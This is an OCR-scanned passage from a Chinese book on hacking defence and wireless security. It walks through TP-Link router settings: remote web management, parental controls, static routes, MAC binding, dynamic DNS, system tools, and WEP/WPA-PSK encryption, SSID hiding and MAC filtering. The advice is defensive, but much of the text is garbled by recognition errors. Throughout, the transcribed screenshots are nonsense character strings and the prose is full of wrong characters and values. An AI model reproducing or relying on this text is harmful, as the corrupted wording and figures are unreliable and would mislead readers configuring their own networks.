保存 | [本 动 ] [D0S 补 条 主机 列表 


[sp 图 选择 “ 远 端 WEB 管 理 ” 选 项 ， 在 打 
开 的 界面 中 可 以 设置 路 由 器 的 WEB 管 理 端 
口 和 广域网 中 可 以 执行 远 端 WEB 管 理 的 计 
算 机 IP 地 址 ， 在 设置 前 请 阅读 相关 注意 事 
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项 ， 如 下 图 所 示 。 


本 页 设 秆 路 由 器 的 WEB 管理 庙 口 和 广域网 中 可 以 执行 运 端 YEE 管 理 的 计算 机 的 
下 地 址 。 


注意 : 1. 路 由 器 昧 认 的 WE 管理 端口 为 80， 如 果 您 改变 了 默认 的 YE 管理 
讽 口 〈 例 如约 为 866》 ， 则 您 必须 用 “I? 地 址 ;端口 ”的 方式 《例如 
http://192. 168.1.1:88》 才 能 登录 路 由 器 执行 EB 界面 管理 。 此 功 
能 需要 重启 路 由 器 才能 生效 。 
2。 路 由 器 点 认 的 远 端 WE 管理 TF 地 址 为 0. 0.0.0， 在 此 默认 状态 
下 ， 广博 弘 中 所 有 计算 机 都 不 能 登录 路 由 器 执行 远 喘 YE5 管 理 ， 如 
果 您 忆 交 了 | 远 端 8FE 管 理 菇 地 址 〈 例 如 改 为 202. 96. 12.8) ， 
刚 广 场 到 中 只 有 具有 措 定 下 地 址 《例如 202. 96. 12.8) 的 计算 机 才 
能 登录 路 由 器 执行 远 端 YEE 管 理 * 如 果 将 远 庙 WEB 管 理 IT 地址 设 为 
255. 255, 255. 255， 那 么 ,广域网 中 所 有 的 计算 机 都 可 以 登录 路 由 
器 执行 远 端 WE 管理 。 
3. 如 果 WEE 管 理 庙 口 与 “转发 规则 ”中 虚拟 服务 器 条 目的 端口 产生 
冲突 , 当 您 保存 配置 时 ， 存 在 端口 冲突 的 虚拟 服务 器 条 目 将 被 自动 


禁用 。 
PP 管理 满口: 四 
远 尖 zz 管理 IP 地 址 : 。 [0000 
确定 | [帮助 


[step 图 在 路 由 功能 列表 中 选择 “家 长 控制 ” 
选项 ， 即 可 进入 “家 长 控制 设置 ”界面 ， 
用 户 可 以 通过 本 界面 控制 小 孩 的 上 网 行 
为 ， 使 得 小 孩 的 计算 机 只 能 在 指定 时 间 访 
问 指定 的 网 站 ， 如 下 图 所 示 。 


he, Pm, tent en LF, ee NetEase 


不 在 抽 则 H 才 中 的 四 家 二 zc 
FE 再 不 启 由 2 
下 村 Fr 地 th: [ 
maracas 上 一 -于 
[太守 ] 
四 WE 地 寺 EE 日 程 计划 类 布 LE 
ER 
[WT] [RHEE RE | (WES | [WE 有] 
| 


[Eee 四 单 击 “增加 单个 条 目 ”按钮 ， 进 入 
“家 长 控制 规则 设置 ” 界面， 如 下 图 所 
示 。 本 界面 中 的 日 程 计划 基于 路 由 器 的 系 
统 时 间 ， 用 户 可 以 在 “系统 工具 一 时 间 设 
置 ”中 查看 和 设置 系统 时 间 。 
Tr 
本 页 面 中 约 日 程 计 划 苦 于 沾 由 器 的 系 缠 时 间 ， 您 可 以 在 “系统 工具 ;HH 间 过 
置 "中 查看 和 设置 系 纺 时 间 。 


过 TOA 0c 地 址 : 
当前 局 | 可 中 PC83UC 地 址 : 
给 多 放 和 站 列表 一 个 指 述 : 
爷 许 小 防 访 问 8 站 域名 : 


一 


在 向 时 间 
总 可 以 在 “上 了 控制 -) 日 和 计划 ”中 设置 时 间 列 
素 


后 : EE 


[生存 ] [到 日] 莉 助 
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侈 注 意 : 一 旦 开启 家 长 控制 功能 ， 不 在 规 
则 列表 中 的 计算 机 将 无 法 上 网 。 


访问 标识 于 


坊 页 可 鹿 a 标 信息 


EE EE EE 


= 


I 
EE 


13.1.6 ”上 网 控制 与 路 由 功能 

上 网 控制 可 以 对 路 由 器 的 规则 、 主 机 
列表 、 访 问 目 标 以 及 日 程 计 划 进 行 设置 ， 
路 由 功能 则 可 以 添加 路 由 表 。 


具体 操作 步骤 如 下 : 
在 路 由 功能 列表 中 选择 “上 网 控制 ” 
选项 下 的 “规则 管理 ”选项 ， 即 可 进入 
“上 网 控制 规则 管理 ”界面 ， 在 本 界面 ， 
用 户 可 以 打开 或 者 关闭 此 功能 ， 并 且 设 定 
默认 的 规则 。 更 为 有 效 的 是 ， 用 户 可 以 设 
置 灵活 的 组 合 规则 ， 通 过 选择 合适 的 “ 主 
机 列表 ”“ 访 问 目标 ”“ 日 程 计划 ”， 构 
成 完整 而 又 强大 的 上 网 控制 规则 ， 如 下 图 


所 示 。 
(me | 


FE 
| [| sW 访 [可 页 医 本 


[Step 国 选择 “日 程 计划 ”选项 ， 进 入 “日 程 
计划 设置 ”界面 ， 在 其 中 可 以 设置 上 网 控 
制 的 日 程 计划 ， 如 下 图 所 示 。 

(es 


本 页 设 村 上 网 榨 坟 日 程 计划 


EE EE | 名 EE Ei 
EF EE 


ESEE] 
了 | 六 N 备 [rv] 页 [车 司 


[step 图 选择 路 由 功能 列表 “路 由 功能 ”选项 
下 的 “静态 路 由 表 ” 选 项 ， 进 入 “静态 路 
由 表 ” 设 置 界面 ， 在 其 中 可 以 设置 路 由 器 
的 静态 路 由 信息 ， 如 下 图 所 示 。 

[ssas | 


本 页 设置 路 由 器 的 稳 太 路 由 信息 。 


Ea 目光 用 地 址 了 | 同类 基态 8 ] 
二 加 新 条 目 使 所 有 条 目 生效 便 所 有 条 局 失效 | | 出 除 所 有 条 目 
二 | 可 [ 丙 | 


13.1.7 MAC 绑 定 与 动态 DNS 
IP 与 MAC 绑 定 在 一 起 便于 网 络 管理 ， 


[sep 回 选择 “主机 列表 ”选项 ， 进 入 “主机 
列表 设置 ”界面 ， 在 其 中 可 以 设置 内 部 主 
机 列表 信息 ， 如 下 图 所 示 。 

[im | 


二 而 加 内 部 主机 过 信息 
ET I 


| 


所 天 单个 条 司 
上 页 
step 图 选择 “访问 目标 ”选项 ， 进 入 “访问 
目标 设置 ”界面 ， 在 其 中 可 以 设置 访问 目 
标 信 息 ， 如 下 图 所 示 。 


所 有 未 避 


ED | 
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在 一 定 程度 上 防止 ARP 病 毒 的 传播 ， 也 可 
在 一 定 程度 上 限制 随意 算 改 IP 地 址 的 现象 。 
动态 DNS 是 指 没 有 固定 IP 的 主机 利用 动态 
DNS 服 务 ， 帮 助 主机 随 着 IP 的 改变 更 新 域名 
与 他 的 关联 。 


设置 MAC 绑 定 与 动态 DNS 的 操作 步骤 
如 下 : 
[step 图 在 路 由 功能 列表 中 选择 “IP 与 MAC 
绑 定 ”选项 下 的 “静态 ARP 绑 定 设置 ” 选 
项 ， 在 打开 的 界面 中 可 以 设置 单机 的 MAC 
地 址 和 IP 地 址 的 匹配 规则 ， 如 下 图 所 示 。 


本 页 设 村 单机 的 mc 地 址 和 IF 地 志 的 开本 损 风 


Am 证 国 不 启用 计 倚 存 ] | 
EE TE ES E33 
1 ET 1 100 宣 ET 


| [全 和 对 | [车 所 有 革 百 天 区 | [ 岗 且 所 有 条 | [要 拓 芝 条目 
EDENIEI 


EE 页 


step 图 选择 “ARP 映 射 表 ”选项 ， 在 打开 的 
界面 中 可 以 绑 定 IP 与 MAC 的 主机 ， 也 可 导 
入 或 删除 现 有 ARP 映 射 表 ， 如 下 图 所 示 。 


[ET ar T ar THWET RE | 
Teer | re wo 1 im | RE [SX] [WR] 


十 商 


EI | 


全 名和 


全 部 导入 


在 路 由 功能 列表 中 选择 “动态 DNS 设 
置 ” 选项， 在 打开 的 界面 中 可 以 设置 Oray. 
com 花 生 过 DDNS 的 参数 。 这 里 需要 先 注册 
一 个 花生 这 账号 ， 如 下 图 所 示 。 


本 页 设 圳 “Ory em 花生 这 I0IS ”的 名 孝 。 
服务 链接 : 花生 赤 动 碘 名 朋 析 隆 才 由 请 。 花生 套 芭 本 二 名 月 折 且 和 部 肌 
服务 提供 省 [元 生 之 (WWWworaycomj 9] 注 有 

用 户 各: 

密码 : 

启用 DDNS: 加 

连接 居 态 :未 近 

服务 类 型 。。 - - - 

域名 信息 ;无 

注意 。 。 您 成 矶 登录 之 后 ， 才 要 先 退出 才能 使 用 其 他 帐号 登 录 

要 录 ] [天 亚 

[全 存 | [天 且 


13.1.8 ”路 由 器 系统 工具 的 设置 


路 由 器 的 系统 工具 主要 用 于 路 由 器 
的 控制 管理 ， 其 中 包括 时 间 设置 、 诊 断 工 
有 具 、 软 件 升 级 、 恢 复出 厂 、 备 份 还 原 、 路 


由 重启 、 口 令 修改 等 功能 ， 如 下 图 所 示 。 


且 
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进入 路 由 器 系统 工具 设置 的 操作 步骤 
如 下 : 
[step 国 在 路 由 功能 列表 中 选择 “系统 工具 ” 


选项 下 的 “时 间 设 置 ” 选 项 ， 在 打开 的 界 
面 中 可 以 设置 路 由 器 的 系统 时 间 ， 用 户 还 
可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获 
取 标 准 的 GMT 时 间 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 的 系统 时 间 ， 您 可 以 选择 自己 设置 时 间或 者 从 互联 网 上 获取 标 
准 的 gr 时 间 。 


注意 : 关闭 路 由 器 电源 后 ， 时 间 信息 会 于 失 ， 当 您 下 次 开机 连 上 Internet 后 , 
路 由 器 将 会 自动 获取 QI 时 间 。 您 必须 先 连 上 Internet 获 取 GI 时 间或 到 此 页 设 
置 时 间 后 ,其 他 功能 中 的 时 间 限 定 才能 主 效 。 


时 区 : |_(GMT+08-00) 北京 ， 重庆 ，S 曾 木 齐 ， 香 洪 特 别 行政 区 , 台北 ， 
日 期 : [2006 年 [1 月 中 日 


时 间 : [9 时 [27 分 [5 种 
优先 使 用 NT? 服务器! 0000 
优先 使 用 ET? 服务 器 2 0.000 
要 到 GMT 时 间 ] ( 仅 在 连 上 互联 同 后 才能 革职 Gr 时 间 ) 
保存 | [帮助 


侈 注意 : 关闭 路 由 器 电源 后 ， 时 间 信息 会 
丢失 ， 当 您 下 次 开机 连 上 Internet 后 ， 路 由 
器 将 会 自动 获取 GMT 时 间 。 您 必须 先 连 上 
Internet 获 取 GMT 时 间或 在 此 界面 设置 时 间 
后 ， 其 他 功能 中 的 时 间 限 定 才能 生效 。 


[Eee 加 选择 “诊断 工具 ”选项 ， 在 打开 的 界 
面 中 可 以 使 用 Ping 或 者 tracert 诊 断路 由 器 的 
连接 状态 ， 如 下 图 所 示 。 


新 工具 
基教 设置 
选择 操作 : i i 
昔 地 址 / 城 名 : 
Ping 包 数 目 : |4 (1-50) 
Ping 也 大 小 : [64 (4-1472 字 节 ) 
rine 04: [800 《100-2000 毫 种 ) 
Tracert 号 孝 : [20 (1-30) 


开始 


Step 图 选择 “软件 升级 ”选项 ， 在 打开 的 界 
面 中 可 以 通过 官方 发 布 的 软件 版 本 ， 对 现 
有 路 由 进行 软件 升级 ， 如 下 图 所 示 。 


帮助 
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(TEE 
通过 升级 本 路 由 器 的 软件 ， 您 将 获得 新 的 功能 。 
文件 名 : 


Wr 45nv2-cn-up bin 


TPTP 服务 器 IP: [192 1581100 
当前 软件 版 本 : 。 4. 19. 18 Build 130123 Rel.32879n 
当前 硬件 版 本 : 。 WEB45W 2.0 00000000 


注意 : 请 使 用 有 线 LAI 吕 连接 进行 软件 升级 。 升 织 时 请 选择 与 当前 硬件 版 本 
一 致 的 软件 。 升 搞 过 程 不 能 关闭 路 由 器 电源 ， 否 刚 将 导致 路 由 器 损坏 而 无 法 
使 用 。 升 级 过 程 约 40 秘 ， 当 升 织 结束 后 ， 路 由 器 将 会 自动 重新 启动 。 

国 E23| | 


侈 注意 : 请 使 用 有 线 LAN 口 连接 进行 软件 
升级 。 升 级 时 请 选择 与 当前 硬件 版 本 一 臻 
的 软件 。 升 级 过 程 不 能 关闭 路 由 器 电源 

否则 将 导致 路 由 器 损坏 而 无 法 使 用 。 升 级 
过 程 约 40s， 当 升级 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 

[step 园 选择 “恢复 出 厂 设置 ”选项 ， 在 打开 
的 界面 中 单 击 “ 恢 复出 厂 设置 ”按钮 ， 可 
以 将 路 由 器 的 所 有 设置 恢复 到 出 厂 时 的 默 
认 状 态 ， 如 下 图 所 示 。 


恢 夏 出 厂 设置 
单 击 此 近 岂 将 使 路 由 器 的 所 有 设置 恢 夏 到 出 站 H 拍 I 认 状态 。 


[ER 
LE 


选择 “备份 和 载 入 配置 文件 ”选项 ， 
在 打开 的 界面 中 可 以 保存 当前 路 由 器 的 设 
置 。 建 议 在 修改 配置 及 升级 软件 前 备份 当前 
的 配置 文件 ， 当 然 也 可 以 通过 选择 备份 的 配 
置 文件 恢复 之 前 的 配置 ， 如 下 图 所 示 。 


您 可 以 在 这 保存 您 的 设置 。 我 们 建议 您 在 修改 配置 及 升级 软件 前 备份 您 的 可 
置 文件 。 


备份 配置 文件 

您 可 以 通过 载 入 配置 文件 来 恢 夏 您 的 设置 。 

路 径 : [| 选择 文件 | 未 选择 任何 文件 载 入 配置 文件 

注意 : 1。 导入 配置 文件 后 ， 设 备 中 原 有 的 用 户 配置 桂 会 去 失 。 如 果 您 载 
入 的 配置 文件 有 误 ， 可 能 会 导致 设备 无 法 被 管理 。 

2， 载 入 可 置 文件 的 过 程 不 能 关闭 路 由 器 电源 ， 否 风 档 导致 路 由 器 


损坏 而 无 法 使 用 。 载 入 过 程 约 20 秒 ， 当 载 入 结束 后 ， 路 由 器 将 会 自 
动 重新 启动 。 


| 


step 轩 选择 “重启 路 由 ”选项 ， 在 打开 的 界 
面 中 单 击 “ 重 启 路 由 器 ”按钮 ， 可 以 重新 
启动 路 由 器 ， 如 下 图 所 示 。 
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单 击 此 按 包 将 使 路 由 器 重新 启动 < 


i 
国 E2 | 


[step 园 选择 “修改 登录 口令 ”选项 ， 在 打开 
的 界面 中 可 以 修改 系统 管理 员 的 用 户 名 与 
口令 ， 建 议 配置 完 路 由 器 后 重新 设置 管理 
员 的 账号 密码 ， 防 止 黑客 使 用 弱 口 令 登 录 
路 由 ， 如 下 图 所 示 。 


修改 登录 口令 


本 页 修改 系统 管理 员 的 用 户 名 及 口令 ， 用 户 名 及 口令 长 度 不 能 超过 14 个 字 
节 。 


原 用 户 名 : 
原 口令: 
新 用 户 名 : 
新 口令 : 
确认 新 口令 ; 


I 辆 Ff3 闻 EE3 | 


[ep 图 选择 “系统 日 志 ” 选 项 ， 在 打开 的 
界面 中 可 以 查看 系统 上 日志， 其 中 包括 管理 
员 登 录 信息 、 路 由 健康 状态 等 。 如 果 路 由 
器 被 非法 修改 ， 可 以 通过 日 志 查看 进行 排 
除 ， 如 下 图 所 示 。 

(ss | 


雪 引 日 志和 内定 
EECTEETRTET 


TD 2006-01-0! 06:00:00 IEHCF slient tx discover (1), 


[step 图 选择 “流量 统计 ”选项 ， 在 打开 的 界 
面 中 可 以 分 别 对 路 由 器 总 的 数据 流量 以 及 
最 近 10s 内 的 数据 流量 进行 统计 。 默 认 情 况 
是 关闭 的 ， 如 有 需要 可 以 打开 。 在 网 络 遭 
受 攻击 时 ， 通 过 数据 流量 的 分 析 对 找 出 攻 


击 主机 也 是 非常 有 帮助 的 ， 如 下 图 所 示 。 


EEEE 雪 fx 
Ez HR [ Fh | WER | =] It | wl sz | 
当前 统计 惑 杠 为 空 | 
此 页 显示 [5 了] 行 [ES 下 到 当前 第 [7"] 页 [过 荔 


13.2 无 线路 由 器 的 安全 策略 


无 线路 由 器 本 身 自 带 有 安全 设置 选 
项 ， 通 过 设置 这 些 安 全 选项 ， 可 以 提高 
无 线路 由 器 的 安全 性 能 ， 从 而 不 受 黑客 
攻击 。 


13.2.1 设置 复杂 的 管理 员 密码 


路 由 器 的 初始 密码 比较 简单 ， 为 了 保 
证 局 域 网 的 安全 ， 一 般 需 要 修改 或 设置 管 
理 员 密 码 ， 具 体 的 操作 步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设 置 界面 ， 
选择 “系统 工具 ”选项 下 的 “修改 登录 密 
码 ” 选 项 ， 打 开 “ 修 改 管理 员 密 码 ” 工 作 
界面 ， 如 下 图 所 示 。 


日 TEwmaaw x 证 
©O | ‘rao 站 


TP-LINK 天 线 汪 率 7 蕊 现 无 线 自由 连 共 切 起 


[Bn 国 在 “ 原 密码 ”文本 框 中 输入 原来 的 
密码 ， 在 “新 密码 ”和 “确认 新 密码 ” 文 
本 框 中 输入 新 设置 的 密码 ， 最 后 单 击 “ 保 
存 ” 按 钮 即 可 ， 如 下 图 所 示 。 
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日 wmassn x 硬 


总 © “| wa 女 | 三 


TP-LINK 


13.2.2 无 线 网 络 WEP 加 密 


WEP 采 用 对 称 加 密 机 理 ， 数 据 的 加 密 
和 解密 采用 相同 的 密 钥 和 加 密 算法 。 下 面 
详细 介绍 无 线 网 络 WEP 加 密 的 具体 方法 。 


1. 设置 无 线路 由 器 WEP 加 密 数 据 


打开 路 由 器 的 Web 后 台 设 置 界面 ， 单 击 
左 侧 “无 线 参数 ”一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 菜 单 中 选择 WEP 选 项 ， 在 “ 密 
钥 格式 选择 ”下 拉 菜 单 中 选择 “ASC II 
码 ” 选 项 。 设 置 密 钥 ， 在 “ 密 钥 1 ”后面 
的 “ 密 钥 类 型 ”下 拉 列 表 中 选择 “64 位 ” 
选项 ， 在 “ 密 钥 内 容 ” 文 本 框 中 输入 要 使 
用 的 密码 ， 本 实例 输入 密码 为 cisco， 单 击 
“保存 ”按钮 ， 如 下 图 所 示 。 


安全 提示 :为 保障 网 络 安 全 ， 强 列 推荐 开启 安全 设置 ， 并 使 用 
PA-PSK/WPA2-PSK AES 加 密 方 法 。 


万 开启 安全 设置 


安全 类 型: [可 了 
安全: [Ea 
密 钥 格式 选择 : [ey 


选择 64 位 密 钥 需 输 入 16 进 制 数字 符 10 个 ， 或 者 ASCII 
码 字符 5 个 。 选 择 126 位 密 钥 需 输 入 16 进 制 数字 符 28 


这 长阳 。。。 个 ,或 者 ASCII 码 字符 13 个 。 先 择 152 位 旬 基 内 入 6 
进 制 数字 符 32 个 ， 或 者 ASCII 码 字符 16 个 。 
和 ED 3 
ETHNIC | 友人 玉 可 
Era ES 
志明 3 @ | 本 可 
ET EE 
[Ga EL 


2 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


2. 客户 端 连 接 

需要 WEP 加 密 认证 的 无 线 客户 端 连接 
的 具体 操作 步骤 。 
[Eee 加 单 击 系统 桌面 右 下 角 圆 图标 ， 无 线 
客户 端 自动 扫描 到 附近 区 域内 的 所 有 无 线 
信号 ， 如 下 图 所 示 。 


一 未 识别 的 网 络 
无 Internet 访问 


元 网 将 连作 


右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 
中 选择 “连接 ”选项 ， 如 下 图 所 示 。 


当前 连接 到 : yy 
一 未 识别 的 网 络 
无 Internet 访问 

无 颖 网 洛 连 接 ~ 
tplink | 二 | 
tgs -| 
204 ri 
TP-UNK_SW | 

| 打开 网 阁 和 共享 中 心 


弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 cisco， 单 去 
“确定 ”按钮 ， 如 下 图 所 示 。 


Estee 四 单 去 系统 桌面 右 下 角 贺 图标， 将 筷 标 
放 在 tp-link 选 项 上 ， 可 以 看 到 无 线 信号 的 连 
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接 情况 。 下 图 所 示 表 明 已 经 成 功 连接 无 线 
路 由 器 。 


当 章 连接 到 
信和 er 
无 intemet 访问 


二 未 识别 的 网 络 
无 Intemet 访问 


无 和 网 才 法 接 


tp-link 


13.2.3 ”WPA-PSK 安 全 加 密 算 法 


WPA-PSK 可 以 看 成 是 一 个 认证 机 制 ， 
只 要 求 一 个 单一 的 密码 进入 每 个 无 线 局 域 
网 节点 (如 无 线路 由 器 ) ， 只 要 密码 正确 ， 
就 可 以 使 用 无 线 网 络 。 下 面 介绍 如 何 使 用 
WPA-PSK 或 者 WPA2-PSK 加 密 无 线 网 络 。 


1. 设置 无 线路 由 器 WPA-PSK 安 全 加 密 
数据 


[Sep 国 打开 路 由 器 的 Web 后 台 设 置 界 面 ， 选 
择 左 侧 “ 无 线 参 数 ” 一 “基本 设置 ”选项 ， 
选中 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 列 表 中 选择 “WPA-PSK/WAP2- 
PSK” 选 项 ， 在 “安全 选项 ”和 “加 密 方 
法 ”下 拉 菜 单 中 均 选 择 “自动 选择 ”选项 ， 
在 “PSK 密 码 ” 文 本 框 中 输入 加 密 密 码 ， 本 
实例 设置 密码 为 sushi1986， 如 下 图 所 示 。 


了 开启 无 线 功能 
取 允许 sp 广播 


厂 开启 srides 功 能 
安全 提示 - 为 保障 网 给 去 全 ， 强 列 椎 逢 开启 去 全 设置 ， 并 使 用 
NPA-PSK/WPA2-FSK AES 加 密 方 法 。 


友 开启 安全 设置 


安全 类 型: | 
安全 选项 : EEEE| 
| 加 方法 : EE 
TS 下: 最 到 为 8 个 字 行 ， 最 长 为 53 个 字符 
EE 
组 证 角 更 新 周期 。 [到 055 ] 单位 为 和 ,最 小 全 为 50 不 更 新 则 为 0) 


| [ 枯 要 ] [大 而] | 


step 图 单 击 “保存 ”按钮 ， 在 弹出 的 提示 对 


话 框 中 单 击 “确定 ”按钮 ， 重 新 启动 路 由 
器 即 可 ， 如 下 图 所 示 。 


192.168.1.1 上 的 网 页 显示 : 


确认 重新 后 0 二 中? 


2. 使 用 WPA-PSK 安 全 加 密 认证 的 无 线 
客户 端 。 


单 击 系统 桌面 右 下 角 贺 图标， 无 线 客 
户 端 会 自动 扫描 区 域内 的 无 线 信号 ， 如 下 
图 所 示 。 


当前 连接 到 


一 未 识别 的 网 络 
无 Internet 访问 


无 线 网 痢 连 接 


tp-link 


右 击 tp-link 选 项 ， 在 弹出 的 快捷 菜单 中 
选择 “连接 ”菜单 命令 ， 如 下 图 所 示 。 


一 
当前 连接 下 他 
ai 

无 Internet 访问 


无 线 网 阁 连 接 全 
pink | 这 EE 
tzgs lil 
204 FP | 


TP-UNK_SW 


[step 图 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 sushi1986， 单 击 
“确定 ”按钮 ， 如 下 图 所 示 。 
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单 击 系统 桌面 右 下 角 圆 图标， 将 饼 标 
放 在 tp-link 信 号 上 ， 可 以 看 到 无 线 信 号 的 连 
接 情 况 。 下 图 所 示 表 明 已 经 成 功 连接 无 线 
路 由 器 。 


pa 
当前 连接 到 : a 
tp-link 
BW internet 访问 
ai 
无 Internet 访问 
无 法 网 阁 连 接 ~ 
tp-link 人 已 连接 J 呈 


bi 
TP-UNK SW |ssiD: tp-link 


| 


打开 网 络 和 共享 中 心 | 


斧 提 示 : 在 WPA-PSK 加 密 算法 的 使 用 过 程 
中 ， 密 码 设 置 应 该 尽 可 能 复杂 ， 并 且 要 注 
意 定 期 更 改 密码 。 


13.2.4 禁用 SSID 广 播 


SSID 就 是 一 个 无 线 网 络 的 名 称 ， 无 线 
客户 端 通过 无 线 网 络 的 SSID 来 区 分 不 同 的 
无 线 网 路 。 为 了 安全 起 见 ， 往 往 要 求 无 线 
AP 禁止 广播 该 SSID， 只 有 知道 该 无 线 网 络 
SSID 的 人 员 才 可 以 进行 无 线 网 络 连接 ， 禁 
用 SSID 广 播 的 具体 操作 步骤 如 下 。 


1. 设置 无 线路 由 器 禁用 SSID 广 播 


无 线路 由 器 禁用 SSID 广 播 的 具体 操作 
步骤 如 下 。 
[sp 图 打开 路 由 器 的 Web 后 台 设 置 界 面 ， 设 
置 无 线 网 络 的 SSID 信 息 ， 取 消 选中 “允许 
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SSID 广 播 ” 复 选 框 ， 单 击 “ 保 存 ” 按 钮 ， 
如 下 图 所 示 。 


本 页 面 设置 路 由 器 无 线 网 络 的 时 本 戎 数 和 安全 认证 选项 


SSTD 呈 : ES 
频段 : 自动 选择 局 
模式 : bps (B02 11e) HL 


厅 开启 无 线 功能 
厂 允许 ssm 广 播 


厂 开启 Bridgs 功 能 
去 全 提示 :为 保障 网 络 安全 ， 站 并 使 用 
WPA-PSK/WPA2-PSK AS 加 密 方 法 : 

反 开启 安全 设置 
安全 类 型 : 
安全 选 顺 : 


WPA-PSK/WPA2-PSK 于 | 
[Em 可 


step 图 弹出 一 个 提示 对 话 框 ， 单 击 “ 确 定 ” 
按钮 ， 重 新 启动 路 由 器 ， 如 下 图 所 示 。 


x 


192.168.1.1 上 的 网 页 显示 : 
确认 重新 启动 路 由 证 ? 


Dee 


职 少 


2. 客户 端 连 接 


禁用 SSID 广 播 的 无 线 客户 端 连接 的 具 
体操 作 步 又 如 下 。 
单 击 系统 桌面 右 下 角 圆 图标， 会 看 到 
无 线 客户 端 自动 扫描 到 区 域内 的 所 有 无 线 
信号 ， 会 发 现 其 中 没有 SSID 为 ssh 的 无 线 网 
络 ， 但 是 会 出 现 一 个 名 称 为 “其 他 网 络 ” 
的 选项 ， 如 下 图 所 示 。 


当前 连接 到 : 


二 未 识别 的 网 络 
无 Internet 访问 


无 线 网 络 连 楼 


SW-IT 
TP-LUNK SW 


其 他 网 络 
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step 图 右 击 “其 他 网 络 ”选项 ， 在 弹出 的 快 
捷 菜单 中 选择 “连接 ”选项 ， 如 下 图 所 示 。 


当前 连接 到 : 


ES 
无 Internet 访问 


无 线 网 阁 连 接 


[step 图 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “名 
称 ” 文 本 框 中 输入 要 连接 网 络 的 SSID 号 ， 
本 实例 输入 ssh， 单 击 “ 确 定 ” 按 钮 ， 如 下 
图 所 示 。 


键入 网 络 的 名 称 (SSID) 


名 称 (Aj: ssh 


[step 园 在 “安全 密 钥 ”文本 框 中 输入 无 线 网 
络 的 密 钥 ， 本 实例 输入 密 钥 sushi1986， 单 
击 “确定 ”按钮 ， 如 下 图 所 示 。 


键入 网 络 安全 密 钥 


安全 密 铜 (S): sushi1986 


回 降 芒 字符 (H) 


[Eee 国 单 去 系统 桌面 右 下 角 上 图 标 ， 将 饼 
标 放 在 ssh 选 项 上 可 以 看 到 无 线 网 络 的 连接 
情况 。 下 图 所 示 表 明 无 线 客 户 端 已 经 成 功 
连接 到 无 线路 由 器 ， 如 下 图 所 示 。 


当前 连接 到 : 


| 二 #R3I 的 网 络 
TY 无 Intemet 访 问 


13.2.5 ”媒体 访问 控制 (MAC) 地 址 过 滤 


网 络 管理 的 主要 任务 之 一 就 是 控制 客 
户 端 对 网 络 的 接 入 和 对 客户 端的 上 网 行为 
进行 控制 ， 无 线 网 络 也 不 例外 ， 通 常 无 线 
AP 利用 媒体 访问 控制 (MAC) 地 址 过 滤 的 
方法 来 限制 无 线 客户 端的 接 入 。 

使 用 无 线路 由 器 进行 MAC 地 址 过 滤 的 

具体 操作 步骤 如 下 。 
[step 图 打开 路 由 器 的 Web 后 台 设 置 界面 ， 单 
击 左 侧 “ 无 线 套数 ”一 “无 线 网 络 MAC 地 
址 过 滤 设 置 ”选项 ， 默 认 情 况 MAC 地 址 过 
滤 功 能 是 关闭 状态 ， 单 击 “ 启 用 过 滤 ” 按 
钮 ， 开启 MAC 地 址 过 滤 功 能 ， 单 击 “ 添 加 
新 条 目 ” 按 钮 ， 如 下 图 所 示 。 


无 线 网 过 MAC 地 址 过 建设 轩 


本 页 设 回 HAC 地址 过 送 未 控制 计算 机 对 本 无 线 网 络 的 访问 。 


Mc 地 址 过 功能 : 
i 

全 允许 列表 中 生效 规 刚 之 外 39mAC 地 址 访问 本 无 暑 网 络 
个 各 上 列表 中 生 站 规则 之 9c 地 址 访问 本 无 绪 网 络 


[RE 


| WB TEXT 和 妥 E ”| 号 加 
沽 有 和 条目 ] [所 有 示 目 主 区 所 有 条 下 天 于 Bai 
EA 一 | [ 椅 助 


lstep 图 打开 “无 线 网 络 MAC 地 址 过 滤 设 
置 ” 对话 框 ， 在 “MAC 地 址 ”文本 框 中 
输入 无 线 客户 端的 MAC 地 址 ， 本 实例 输 
入 MAC 地 址 为 00-0c-29-5A-3C-97， 在 “ 描 
述 ” 文 本 框 中 输入 MAC 描 述 信 息 sushipc， 

在 “类 型 ”下 拉 列 表 中 选择 “允许 ” 选 
项 ， 在 “状态 ”下 拉 列 表 中 选择 “生效 ” 
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选项 ， 依 照 此 步骤 将 所 有 合法 的 无 线 客 户 
端的 MAC 地 址 加 入 此 MAC 地 址 表 后 ， 单 去 
“保存 ”按钮 ， 如 下 图 所 示 。 


天 过 MACjhjli 汇 设 理 


本 页 计算 机 对 本 无 线 网 络 的 访问 。 
MC 地 址 : [00-0c-29-5A-3C-97 
手 还 : sushipe 
类 型 : 元 许 到 
状态 : 生效 到 
保存 | [到 回 ] [ 需 助 


选择 “过 小 规则 ”选项 下 的 “禁止 ” 
单 选 框 ， 表 明 在 下 面 MAC 列 表 中 生效 规则 
之 外 的 MAC 地 址 不 可 以 访问 无 线 网 络 ， 如 
下 图 所 示 。 


条 志 香 原 志 要 务 条 错 接 ， 如 Iaterzet 莲 戏 ， 视 频 会 议 ， 网 站 电话 等 。 由 于 防火 坟 8 存 在， 这 
些 得 序 无 法 在 简单 的 ENT 踏 由 下 工作 * 特殊 应 用 程序 使 得 其 些 这 样 的 应 用 程序 能 RAT 路 
由 下 工作 


了 | MD | Rb | WO | HH VER 
EE 
[ES 本 可 [ 攻 页 | 


这 样 无 线 客户 端 在 访问 无 线 AP 时 ， 
会 发 现 除 了 MAC 地 址 表 中 的 MAC 地 址 之 
外 ， 其 他 的 MAC 地 址 无 法 再 访问 无 线 AP， 
也 就 无 法 访问 互联 网 。 


无 线路 由 安全 管理 工具 


使 用 无 线路 由 管理 工具 可 以 方便 管理 
无 线 网 络 中 的 上 网 设备 ， 本 节 就 来 介绍 两 
个 无 线路 由 安全 管理 工具 ， 包 括 360 路 由 器 
卫士 与 路 由 优化 大 师 。 


